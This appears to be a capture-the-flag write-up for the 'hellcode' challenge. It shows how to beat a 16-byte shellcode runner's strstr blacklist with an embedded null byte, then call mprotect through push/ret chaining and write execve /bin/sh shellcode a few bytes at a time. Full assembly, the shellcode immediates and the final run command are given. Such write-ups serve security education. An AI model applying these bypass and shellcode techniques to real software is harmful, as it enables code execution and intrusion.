Problem Overview
In this challenge, we are asked to exploit a program (source) that executes any 16 bytes of machine code we give it. It reads those bytes with fgets, which stops once 16 bytes have been read or a newline is hit, whichever comes first. It then scans our code for blacklisted byte sequences to prevent us from doing specific things.

One important point is that it uses strstr to check whether our code contains the blacklisted sequences. Being a C string function, strstr treats its input as ending at the first null byte and never looks past it. That matters because fgets stops only at a newline or at the length limit, so it happily accepts null bytes in the middle of our input. Any bytes we place after a null byte are read and executed but never checked.
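
The blind spot can be modelled in a few lines of Python. This is only a sketch of the behaviour, not the challenge's actual check: the helper name strstr_finds is made up for illustration, and the byte strings are the standard encodings of call r15 and mov bl, 0.

```python
def strstr_finds(buf: bytes, needle: bytes) -> bool:
    """Mimic C strstr: only the bytes before the first NUL are searched."""
    visible = buf.split(b"\x00", 1)[0]
    return needle in visible


# call r15 encodes as 41 ff d7, so it contains the blacklisted 0xff byte.
blocked = b"\x41\xff\xd7"
# mov bl, 0 encodes as b3 00; its NUL hides everything that follows.
hidden = b"\xb3\x00" + blocked

print(strstr_finds(blocked, b"\xff"))  # True: the check would reject this
print(strstr_finds(hidden, b"\xff"))   # False: the check never sees 0xff
```

The same input still contains the 0xff byte; the check simply stops looking before it reaches it.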

In a test run, our input successfully bypassed the strstr(tmp_code,"\xff") check. Now that we know we can input any code so long as a null byte comes before the offending bytes, we still need to craft shellcode. First I looked online for shellcode that fits in 16 bytes, but everything I found required the string /bin/sh to already be present in the executable. It's also worth noting that we can't use ready-made shellcode unmodified: it is normally written to contain no null bytes, while we need a null byte ahead of any blacklisted sequence.
So how can we run shellcode if nothing we can find fits in 16 bytes?
My initial hope was that the text segment would be writable, meaning we could patch the call fgets(tmp_code, 17, stdin) into fgets(tmp_code, 1000, stdin). It was not. The next thing I noticed was that the 16 bytes of code are placed in an mmapped region of 4096 bytes. After seeing this, I hoped that I could write part of the shellcode into the buffer, call code_runner again, write the next part, and keep repeating that. Code for one such round would look like:
mov word [buffer], 0xshellcode
call code_runner
Sadly, the buffer was not writable either, which ruled out this strategy as well. After thinking for a bit, I decided to try calling mprotect(buffer, 4096, 7), which would make the buffer writable. To do this, we would need to embed assembly that looks like this:
mov rdi, buffer ;rdi is the address parameter
mov rdx, 7 ;prot parameter. 7 indicates rwx
mov rsi, 4096 ; length parameter
call 0x400860 ; address of mprotect
call 0x400996 ; call back to code_runner so that we can enter our next 16 bytes and move on
Luckily, rdi happens to contain the address of the buffer already, so we can eliminate that instruction. rsi also happens to already contain 4096, so we can reduce our assembly to:
mov rdx, 7
call 0x400860
call 0x400996
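
As a quick check on the prot argument, here is a small sketch of why 7 means read, write and execute. The constants are written out by hand using the values from the Linux headers rather than imported, so the snippet runs anywhere.

```python
# Protection flag values as defined in the Linux <sys/mman.h> headers.
PROT_READ = 0x1
PROT_WRITE = 0x2
PROT_EXEC = 0x4

# OR-ing all three together gives the value loaded into rdx.
prot = PROT_READ | PROT_WRITE | PROT_EXEC
print(prot)  # 7
```
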
Let's try assembling these three instructions with python shellme.py -i "mov rdx, 7\ncall 0x400860\ncall 0x400996" -a elf64.

Wonderful, it fits within 16 bytes! Let's run it and see what happens.

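Well, those calls aren't quite what we expected. That's because a call with an immediate operand is encoded as an offset relative to the instruction that follows it, so the destination depends on where the code ends up in memory. We need absolute calls. To get one, we would mov rax, 0xaddress and then call rax. So let's try that.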
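
To see why the relative calls miss, here is a sketch of how a near call (opcode e8 followed by a signed 32-bit displacement) resolves its target. Two values are assumptions made purely for illustration: that the assembler laid the code out at origin 0, and the buffer address, which is hypothetical and not taken from the real binary.

```python
import struct

MPROTECT = 0x400860
ASSUMED_ORIGIN = 0x0                  # assumption: where the assembler thinks the code lives
HYPOTHETICAL_BUFFER = 0x7ffff7ff6000  # hypothetical address of the mmapped buffer


def encode_call_rel32(insn_addr: int, target: int) -> bytes:
    """Encode `call target` for an instruction located at insn_addr."""
    rel = target - (insn_addr + 5)  # displacement counts from the next instruction
    return b"\xe8" + struct.pack("<i", rel)


def call_destination(insn_addr: int, encoded: bytes) -> int:
    """Return where the encoded call lands when executed at insn_addr."""
    (rel,) = struct.unpack("<i", encoded[1:5])
    return insn_addr + 5 + rel


encoded = encode_call_rel32(ASSUMED_ORIGIN, MPROTECT)
print(hex(call_destination(ASSUMED_ORIGIN, encoded)))       # 0x400860
print(hex(call_destination(HYPOTHETICAL_BUFFER, encoded)))  # shifted by the buffer address
```

The same five bytes reach mprotect only when they run at the address the assembler assumed. Anywhere else, the destination moves along with the code.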

Well, the mov rax / call rax version is too long. Now think about what ret does: it pops the address on top of the stack and jumps to it. That means pushing 0x400860 and letting a ret instruction execute should be equivalent to calling 0x400860, apart from the state the stack is left in, which we don't care about given that we only want a shell, not a cleanly running program. Pushing 0x400996 first places code_runner's address underneath, so when mprotect returns it lands in code_runner. So let's try this technique:
mov rdx, 7
push 0x400996
push 0x400860
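
The order of the two pushes matters, which a toy model of the stack makes clear. This is only a sketch: the list stands in for the real stack, and push_imm32 is a helper made up for illustration that uses the standard encoding of push with a 32-bit immediate (opcode 68).

```python
import struct

MPROTECT = 0x400860
CODE_RUNNER = 0x400996


def push_imm32(value: int) -> bytes:
    """Encode `push imm32`: opcode 0x68 followed by the little-endian immediate."""
    return b"\x68" + struct.pack("<I", value)


stack = []
stack.append(CODE_RUNNER)  # push 0x400996
stack.append(MPROTECT)     # push 0x400860

visited = []
visited.append(stack.pop())  # the ret after our code pops mprotect's address
visited.append(stack.pop())  # mprotect's own ret pops code_runner's address
print([hex(addr) for addr in visited])  # ['0x400860', '0x400996']

# Each push costs 5 bytes, so the pair uses 10 of the 16 available bytes.
print(len(push_imm32(CODE_RUNNER)) + len(push_imm32(MPROTECT)))  # 10
```
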
After assembling this payload and running it, we get exactly what we want: mprotect is called on the buffer, and code_runner is called again for a second round. We now have a region of writable and executable memory to work with. Now we just have to write shellcode to that memory and call it. I'll be using the shellcode found here: http://shell-storm.org/shellcode/files/shellcode-603.php. The plan is to save the address of the buffer in r15, a seldom-used register, and write the shellcode to that memory a few bytes at a time. The code to do that follows. Each group assembles to at most 16 bytes and is sent as one round of input; the nops are padding, and the push 0x400996 at the end of each group sends execution back to code_runner for the next round.
mov r15, [rsp+0x68] ; save the address of the memory we just made writable and executable in r15 for easier access later
mov word [r15], 0x3148
push 0x400996

mov word [r15+2], 0x48d2
nop
nop
nop
nop
push 0x400996

mov dword [r15+4], 0x622f2fbb
nop
nop
nop
push 0x400996

mov dword [r15+8], 0x732f6e69
nop
nop
nop
push 0x400996

mov dword [r15+12], 0xebc14868
nop
nop
nop
push 0x400996

mov dword [r15+16], 0x89485308
nop
nop
nop
push 0x400996

mov dword [r15+20], 0x485750e7
nop
nop
nop
push 0x400996

mov dword [r15+24], 0x3bb0e689
nop
nop
nop
push 0x400996

mov bl,0
mov dword [r15+28], 0x0000050f
nop
push 0x400996

mov bl,0
call r15
xor eax,eax
xor eax,eax
xor eax,eax
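
As a sanity check on the immediates used in the groups above, the following sketch replays each write into a 32-byte scratch buffer and prints the result. x86 stores immediates in little-endian order, which is why the values in the listing look byte-swapped compared with the shellcode itself. The offsets and values are copied from the listing; the buffer here is just a Python bytearray, not the real mmapped region.

```python
import struct

# (offset from r15, struct format, immediate) for every mov in the listing.
# "<H" is a little-endian 16-bit word, "<I" a little-endian 32-bit dword.
writes = [
    (0, "<H", 0x3148),
    (2, "<H", 0x48d2),
    (4, "<I", 0x622f2fbb),
    (8, "<I", 0x732f6e69),
    (12, "<I", 0xebc14868),
    (16, "<I", 0x89485308),
    (20, "<I", 0x485750e7),
    (24, "<I", 0x3bb0e689),
    (28, "<I", 0x0000050f),
]

buf = bytearray(32)
for offset, fmt, value in writes:
    struct.pack_into(fmt, buf, offset, value)

shellcode = bytes(buf)
print(shellcode.hex())
print(b"//bin/sh" in shellcode)  # True: the path is embedded in the code
```

The final two bytes of the last dword are zero padding after the syscall instruction (0f 05).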

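In the last two groups of the assembly, you may have noticed the mov bl,0. Its encoding, b3 00, contains a null byte, so placing it first puts a null byte ahead of the rest of the group's code and bypasses the strstr check as described earlier. After we assemble and run this in a debugger, we see process ***** is executing new program: /bin/dash. That means our exploit was successful. To run it, we use (python -c "print 'shellcode'"; cat) | /problems/hellcode/hellcode, where 'shellcode' stands for the assembled bytes. The trailing cat keeps stdin open so that we can type commands into the resulting shell.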